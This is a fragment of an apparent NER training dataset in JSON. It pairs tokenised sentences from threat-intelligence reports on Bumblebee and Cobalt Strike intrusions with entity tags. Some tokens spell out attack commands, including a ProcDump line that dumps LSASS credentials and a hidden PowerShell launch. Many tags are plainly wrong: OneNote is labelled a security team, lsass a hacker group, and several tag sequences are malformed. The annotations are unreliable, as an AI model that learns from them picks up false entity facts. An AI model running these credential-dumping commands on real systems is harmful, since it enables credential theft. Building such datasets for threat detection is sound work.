- "as", - "a", - "list", - "of", - "registry", - "keys,", - "yet", - "we", - "also", - "observed", - "a", - "variant", - "in", - "which", - "similar", - "content", - "was", - "written", - "into", - "a", - "TXT", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "obfuscated", - "Powershell", - "script", - "that", - "runs", - "another", - "Base64", - "obfuscated", - "layer", - "that", - "finally", - "decodes", - "the", - ".NET", - "payload." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "embedded", - "inside", - "as", - "a", - "base64", - "encoded", - "buffer" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "its", - "resources", - "we", - "can", - "find", - "another", - "PE" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "been", - "obfuscated", - "in", - "order", - "to", - "hide", - "its", - "real", - "intentions" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Base64", - "encoded", - "string,", - "and", - "in", - "the", - "other", - "as", - "a", - "hexadecimal", - "string" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PE", - "file", - "was", - "encoded", - "as", - "an", - "obfuscated", - "hexadecimal", - "string." - ], - "ner_tags": [ - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Base64", - "encoded", - "script" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Base64" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "obfuscated", - "by", - "XOR" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "three", - "layers", - "where", - "one", - "decodes", - "content", - "for", - "the", - "next" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decodes", - "the", - "next", - "element:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deobfuscates", - "and", - "runs", - "another", - "block", - "of", - "code" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deobfuscate", - "it." - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "decodes", - "it" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "deobfuscate", - "the", - "file" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decoding" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "decoding" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "Decoded", - "content" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Decoded", - "content" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "deobfuscates" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "was", - "decoded" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "decoding", - "the", - "base64-encoded", - "content," - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decompressed" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "reading/writing", - "registry", - "keys" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "written", - "to", - "the", - "registry,", - "as", - "a", - "list", - "of", - "keys." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JavaScript", - "fetched", - "from", - "the", - "C2", - "server" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloaded", - "code", - "chunk" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GET", - "request", - "with", - "C2", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Process", - "Hollowing", - "–", - "one", - "of", - "the", - "classic", - "methods", - "of", - "PE", - "injection" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "PE", - "injection,", - "manual", - "loading", - "into", - "the", - "parent", - "process" - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "fetches", - "IcedID", - "from", - "a", - "remote", - "resource" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Malicious", - "OneNote", - "attachment" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "The", - "“Forked”", - "version", - "of", - "the", - "malware", - "loader", - "first", - "appeared", - "in", - "February", - "2023,", - "distributed", - "directly", - "through", - "thousands", - "of", - "personalized", - "invoice-themed", - "phishing", - "emails." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Time", - "B-Exp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "These", - "messages", - "used", - "Microsoft", - "OneNote", - "attachments", - "(.one)", - "to", - "execute", - "a", - "malicious", - "HTA", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "I-SamFile", - "B-SecTeam", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "string-decryption", - "code" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "sending", - "basic", - "host", - "info", - "to", - "the", - "C2" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "took", - "place", - "over", - "an", - "unencrypted", - "HTTP", - "channel,", - "the", - "network", - "traffic", - "was", - "plainly", - "visible." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "When", - "the", - "user", - "double", - "clicks", - "or", - "opens", - "the", - "lnk", - "file," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "lures", - "the", - "user", - "to", - "open", - "a", - "document.lnk", - "file", - "which", - "will", - "execute", - "the", - "malicious", - "DLL", - "loader" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "execution", - "phase", - "started", - "with", - "that", - "password", - "protected", - "zip,", - "which", - "after", - "extracting", - "would", - "show", - "the", - "user", - "an", - "ISO", - "file", - "that", - "after", - "the", - "user", - "double", - "clicks" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "starts", - "a", - "hidden", - "file", - "in", - "the", - "directory" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "proceeded", - "to", - "inject", - "into", - "various", - "other", - "processes", - "on", - "the", - "host", - "(explorer.exe,", - "rundll32.exe)." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "From", - "these", - "injected", - "processes," - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "different", - "processes", - "they", - "injected", - "into" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "process", - "where", - "Cobalt", - "Strike", - "was", - "injected", - "into" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "process", - "injection", - "technique", - "was", - "used", - "multiple", - "times", - "to", - "inject", - "into", - "different", - "processes" - ], - "ner_tags": [ - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Almost", - "every", - "post-exploitation", - "job", - "was", - "launched", - "from", - "an", - "injected", - "process." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "process", - "where", - "the", - "threat", - "actors", - "injected:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "where", - "they", - "were", - "previously", - "injected", - "into" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "actors", - "performed", - "the", - "first", - "lateral", - "movement", - "from", - "the", - "beachhead", - "to", - "the", - "server", - "using", - "RDP", - "with", - "an", - "Administrator", - "account" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "previously", - "injected", - "into" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Process", - "injections", - "in", - "svchost", - "process", - "via", - "CreateRemoteThread,", - "Default", - "named", - "pipes,", - "etc" - ], - "ner_tags": [ - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "processes", - "which", - "threat", - "actors", - "injected", - "into:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "injecting", - "into", - "various", - "processes", - "on", - "the", - "host," - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "various", - "injections", - "across", - "hosts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injected", - "into", - "multiple", - "processes", - "on", - "different", - "hosts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "began", - "discovery", - "tasks", - "using", - "Windows", - "utilities" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "These", - "batch", - "scripts’", - "purposes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "two", - "batch", - "scripts", - "were", - "dropped", - "and", - "run." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "the", - "following", - "command", - "line:", - "C:\\Windows\\System32\\cmd.exe", - "/c" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C", - "powershell.exe", - "-nop", - "-w", - "hidden", - "-c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "launching", - "the", - "getsystem", - "command", - "in", - "the", - "wrong", - "console", - "(shell", - "console", - "rather", - "than", - "the", - "beacon", - "console)." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C", - "getsystem" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd.exe", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "C", - ":\\Windows\\system32\\cmd.exe", - "/C", - "shell" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "actors", - "used", - "two", - "scripts", - "named", - "s.bat", - "(for", - "servers)", - "and", - "w.bat" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "bat", - "script:" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "bat", - "script:" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "Windows", - "utilities", - "like", - "ping", - "and", - "tasklist." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "tasklist" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "tasklist", - "was", - "also", - "used", - "in", - "order", - "to", - "enumerate", - "processes", - "on", - "multiple", - "hosts", - "remotely" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "process", - "list" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "started", - "their", - "first", - "lateral", - "movement", - "using", - "RDP" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "they", - "accessed", - "the", - "server", - "via", - "RDP" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Threat", - "actors", - "used", - "explorer.exe,", - "where", - "they", - "were", - "previously", - "injected", - "into,", - "to", - "initiate", - "a", - "proxied", - "RDP", - "connection", - "to", - "a", - "server:" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "started", - "their", - "first", - "lateral", - "movement", - "using", - "RDP", - "to", - "pivot", - "to", - "a", - "server", - "using", - "the", - "local", - "Administrator", - "account." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "first", - "lateral", - "movement", - "from", - "the", - "beachhead", - "to", - "the", - "server", - "using", - "RDP", - "with", - "an", - "Administrator", - "account:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "again", - "on", - "a", - "server", - "with", - "Administrator", - "privileges." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "the", - "Administrator", - "account", - "each", - "time" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "execute", - "Procdump,", - "which", - "was", - "used", - "to", - "dump", - "lsass." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "they", - "used", - "yet", - "another", - "technique", - "to", - "dump", - "LSASS", - "on", - "the", - "beachhead", - "host,", - "this", - "time", - "using", - "a", - "built", - "in", - "Windows", - "tool", - "comsvcs.dll." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "B-SamFile" - ] - }, - { - "tokens": [ - "dumping", - "their", - "LSASS", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LSASS", - "Dump" - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam" - ] - }, - { - "tokens": [ - "Threat", - "actors", - "dumped", - "the", - "LSASS", - "process", - "from", - "the", - "beachhead", - "using", - "the", - "comsvcs.dll", - "MiniDump", - "technique" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O" - ] - }, - { - "tokens": [ - "C:\\programdata\\procdump64.exe", - "-accepteula", - "-ma", - "lsass.exe", - "C:\\ProgramData\\lsass.dmp" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "Threat", - "actors", - "also", - "dropped", - "procdump.exe", - "and", - "procdump64.exe", - "on", - "multiple", - "workstations", - "remotely,", - "dumped", - "LSASS," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Next,", - "the", - "threat", - "actor", - "transferred", - "Sysinternals", - "tool", - "Procdump", - "over", - "SMB,", - "to", - "the", - "ProgramData", - "folders", - "on", - "multiple", - "hosts", - "in", - "the", - "environment." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Using", - "the", - "Cobalt", - "Strike", - "beacon,", - "the", - "threat", - "actors", - "transferred", - "AnyDesk", - "(1).exe", - "file", - "from", - "the", - "beachhead", - "to", - "a", - "server:" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actors", - "also", - "transferred", - "ProcDump", - "from", - "the", - "beachhead", - "to", - "multiple", - "workstations:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "first", - "lateral", - "movement", - "was", - "performed", - "in", - "order", - "to", - "drop", - "and", - "install", - "AnyDesk." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "threat", - "actors", - "remotely", - "dropped", - "AnyDesk", - "binary", - "on", - "a", - "server", - "from", - "the", - "beachhead:" - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "PowerShell", - "to", - "download", - "and", - "execute" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "which", - "downloaded", - "obfuscated", - "PowerShell", - "and", - "executed", - "it", - "in", - "memory:" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "just", - "C2", - "communications;", - "until", - "around", - "3", - "hours", - "later,", - "Bumblebee", - "dropped", - "a", - "Cobalt", - "Strike", - "beacon" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool" - ] - }, - { - "tokens": [ - "dropping", - "and", - "the", - "execution", - "of", - "several", - "payloads", - "using", - "multiple", - "techniques" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "threat", - "actors", - "used", - "CS", - "as", - "the", - "main", - "Command", - "and", - "Control", - "tool,", - "dropped", - "several", - "payloads," - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "used", - "a", - "service", - "account", - "to", - "execute", - "a", - "Cobalt", - "Strike", - "beacon", - "remotely", - "on", - "a", - "Domain", - "Controller." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\System32\\cmd.exe", - "/c", - "start", - "rundll32", - "namr.dll,IternalJob" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "Sysmon", - "File", - "Created", - "event", - "showing", - "wab.exe", - "created", - "by", - "rundll32.exe" - ], - "ner_tags": [ - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd.exe", - "/C", - "rundll32.exe" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "C:\\Windows\\System32\\rundll32.exe" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "Because", - "rundll32.exe", - "executed", - "PowerShell,", - "we", - "can", - "see", - "that", - "rundll32.exe", - "created" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "were", - "initiated", - "from", - "the", - "rundll32.exe", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "The", - "random", - "(PsExec)", - "service", - "runs", - "a", - "rundll32.exe", - "process", - "without", - "any", - "arguments." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "metadata", - "included", - "TA", - "machine’s", - "hostname," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "systeminfo" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "wmic", - "product", - "get", - "name,version" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "“Display", - "information", - "about", - "current", - "Windows", - "version" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MAC", - "address" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "ipconfig", - "/all" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "showing", - "wab.exe", - "executed", - "by", - "WMI" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "wmic", - "/node" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "wmic" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "obfuscated", - "PowerShell" - ], - "ner_tags": [ - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Once", - "deobfuscated," - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "its", - "installation", - "as", - "a", - "service", - "was", - "used", - "in", - "order", - "to", - "persist", - "and", - "create", - "a", - "backdoor", - "to", - "the", - "network." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "win32", - "function", - "CreateServiceA", - "was", - "used", - "by", - "the", - "malware", - "in", - "order", - "to", - "create", - "a", - "remote", - "service", - "over", - "RPC", - "on", - "the", - "server." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "remote", - "service", - "was", - "created", - "with", - "random", - "alphanumeric", - "characters,", - "service", - "name", - "and", - "service", - "file", - "name" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Below", - "is", - "an", - "example", - "of", - "the", - "service", - "edc603a", - "that", - "was", - "created" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "new", - "service", - "was", - "created" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "actors", - "obtained", - "and", - "abused", - "credentials", - "of", - "privilege", - "domain", - "accounts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "service", - "account,", - "with", - "Domain", - "Administration", - "permissions,", - "was", - "used", - "to", - "create", - "a", - "remote", - "service", - "on", - "a", - "Domain", - "Controller", - "to", - "move", - "laterally." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "service", - "account", - "logged", - "into", - "one", - "of", - "the", - "Domain", - "Controllers", - "from", - "the", - "beachhead." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "We", - "observed", - "the", - "threat", - "actors", - "deleting", - "their", - "tools", - "(Procdump,", - "Network", - "scanning", - "scripts,", - "etc.)", - "from", - "hosts." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ProcDump", - "deletion", - "from", - "the", - "ProgramData", - "folder", - "of", - "all", - "targeted", - "workstations", - "after", - "dumping", - "their", - "LSASS", - "process:" - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "actors", - "also", - "dropped", - "procdump.exe", - "and", - "procdump64.exe", - "on", - "multiple", - "workstations", - "remotely,", - "dumped", - "LSASS,", - "and", - "deleted", - "them", - "from", - "the", - "ProgramData", - "folder:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "whoami" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "C", - ":\\Windows\\system32\\cmd.exe", - "/C", - "shell", - "whoami", - "/all" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "win32", - "function", - "CreateServiceA", - "was", - "used", - "by", - "the", - "malware" - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "account", - "used", - "to", - "perform", - "this", - "lateral", - "movement" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "actors", - "executed", - "this", - "tool", - "on", - "patient", - "0", - "with", - "low-level", - "privileges", - "multiple", - "times" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "then", - "deployed", - "Anydesk,", - "which", - "was", - "the", - "only", - "observed", - "persistence", - "mechanism", - "used", - "during", - "the", - "intrusion." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "they", - "accessed", - "the", - "server", - "via", - "Anydesk." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "AnyDesk", - "and", - "its", - "installation", - "as", - "a", - "service", - "was", - "used" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AnyDesk", - "logs,", - "%ProgramData%\\AnyDesk\\ad_svc.trace", - "and", - "%AppData%\\AnyDesk\\ad.trace,", - "show", - "that", - "it", - "was", - "used", - "during", - "Day", - "1", - "and", - "Day", - "7", - 